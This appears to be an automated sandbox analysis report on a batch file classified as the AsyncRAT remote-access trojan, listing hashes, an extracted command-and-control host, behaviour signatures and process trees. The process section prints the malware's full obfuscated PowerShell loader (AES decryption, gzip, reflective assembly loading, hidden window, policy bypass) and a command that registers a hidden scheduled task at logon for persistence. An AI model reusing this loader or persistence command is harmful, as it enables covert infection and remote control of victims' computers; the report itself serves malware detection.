Analysis
-
max time kernel
79s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 16:16
Static task
static1
Behavioral task
behavioral1
Sample
lol.bat
Resource
win7-20240903-en
General
-
Target
lol.bat
-
Size
279KB
-
MD5
b5c81dca8f6b148790d14c93ba1788d4
-
SHA1
11fa7bdf65ac8b835b27c895f3d3e357f87a28f2
-
SHA256
7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb
-
SHA512
14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51
-
SSDEEP
6144:5toA7r23ZOt+yxLqRvs+wAbTXJuE/SzXm3+gK+4QpTz:4AsOkmqTPbTJuEcmut+ppTz
Malware Config
Extracted
asyncrat
Default
127.0.0.1:32758
pressure-continuous.gl.at.ply.gg:32758
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/448-46-0x000001F35AAA0000-0x000001F35AAB6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 22 448 powershell.exe 24 448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid Process 448 powershell.exe 3700 powershell.exe 4428 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid Process 3700 powershell.exe 3700 powershell.exe 4428 powershell.exe 4428 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeIncreaseQuotaPrivilege 4428 powershell.exe Token: SeSecurityPrivilege 4428 powershell.exe Token: SeTakeOwnershipPrivilege 4428 powershell.exe Token: SeLoadDriverPrivilege 4428 powershell.exe Token: SeSystemProfilePrivilege 4428 powershell.exe Token: SeSystemtimePrivilege 4428 powershell.exe Token: SeProfSingleProcessPrivilege 4428 powershell.exe Token: SeIncBasePriorityPrivilege 4428 powershell.exe Token: SeCreatePagefilePrivilege 4428 powershell.exe Token: SeBackupPrivilege 4428 powershell.exe Token: SeRestorePrivilege 4428 powershell.exe Token: SeShutdownPrivilege 4428 powershell.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeSystemEnvironmentPrivilege 4428 powershell.exe Token: SeRemoteShutdownPrivilege 4428 powershell.exe Token: SeUndockPrivilege 4428 powershell.exe Token: SeManageVolumePrivilege 4428 powershell.exe Token: 33 4428 powershell.exe Token: 34 4428 powershell.exe Token: 35 4428 powershell.exe Token: 36 4428 powershell.exe Token: SeIncreaseQuotaPrivilege 4428 powershell.exe Token: SeSecurityPrivilege 4428 powershell.exe Token: SeTakeOwnershipPrivilege 4428 powershell.exe Token: SeLoadDriverPrivilege 4428 powershell.exe Token: SeSystemProfilePrivilege 4428 powershell.exe Token: SeSystemtimePrivilege 4428 powershell.exe Token: SeProfSingleProcessPrivilege 4428 powershell.exe Token: SeIncBasePriorityPrivilege 4428 powershell.exe Token: SeCreatePagefilePrivilege 4428 powershell.exe Token: SeBackupPrivilege 4428 powershell.exe Token: SeRestorePrivilege 4428 powershell.exe Token: SeShutdownPrivilege 4428 powershell.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeSystemEnvironmentPrivilege 4428 powershell.exe Token: SeRemoteShutdownPrivilege 4428 powershell.exe Token: SeUndockPrivilege 4428 powershell.exe Token: SeManageVolumePrivilege 4428 powershell.exe Token: 33 4428 powershell.exe Token: 34 4428 powershell.exe Token: 35 4428 powershell.exe Token: 36 4428 powershell.exe Token: SeIncreaseQuotaPrivilege 4428 powershell.exe Token: SeSecurityPrivilege 4428 powershell.exe Token: SeTakeOwnershipPrivilege 4428 powershell.exe Token: SeLoadDriverPrivilege 4428 powershell.exe Token: SeSystemProfilePrivilege 4428 powershell.exe Token: SeSystemtimePrivilege 4428 powershell.exe Token: SeProfSingleProcessPrivilege 4428 powershell.exe Token: SeIncBasePriorityPrivilege 4428 powershell.exe Token: SeCreatePagefilePrivilege 4428 powershell.exe Token: SeBackupPrivilege 4428 powershell.exe Token: SeRestorePrivilege 4428 powershell.exe Token: SeShutdownPrivilege 4428 powershell.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeSystemEnvironmentPrivilege 4428 powershell.exe Token: SeRemoteShutdownPrivilege 4428 powershell.exe Token: SeUndockPrivilege 4428 powershell.exe Token: SeManageVolumePrivilege 4428 powershell.exe Token: 33 4428 powershell.exe Token: 34 4428 powershell.exe Token: 35 4428 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exedescription pid Process procid_target PID 1580 wrote to memory of 3700 1580 cmd.exe 86 PID 1580 wrote to memory of 3700 1580 cmd.exe 86 PID 3700 wrote to memory of 4428 3700 powershell.exe 88 PID 3700 wrote to memory of 4428 3700 powershell.exe 88 PID 3700 wrote to memory of 2632 3700 powershell.exe 93 PID 3700 wrote to memory of 2632 3700 powershell.exe 93 PID 2632 wrote to memory of 3392 2632 WScript.exe 94 PID 2632 wrote to memory of 3392 2632 WScript.exe 94 PID 3392 wrote to memory of 448 3392 cmd.exe 96 PID 3392 wrote to memory of 448 3392 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lol.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lol.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_70_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_70.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_70.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_70.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_70.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_70.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5f8d49a4af7a844bfc7247d5670def557
SHA126ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA25661c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA5129e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
279KB
MD5b5c81dca8f6b148790d14c93ba1788d4
SHA111fa7bdf65ac8b835b27c895f3d3e357f87a28f2
SHA2567772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb
SHA51214bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51
-
Filesize
114B
MD58d53099ba3b77b55039d41ad3f29670f
SHA13d3896ed4a11e7906f14a9f89fdb4849d3c381ef
SHA256c3700d6bcd0e76b0cb07748d54a5efae87d946a458eb16048407508bf0b4a702
SHA512220f3cf7e1b11417b88f0fbe0b70f064c93c587f9be8c486ac3228bde3c35c456c9fef99feea55ce246f54c73cd512f9c5db527dc1fb32b5ff8ae8ee32412d4a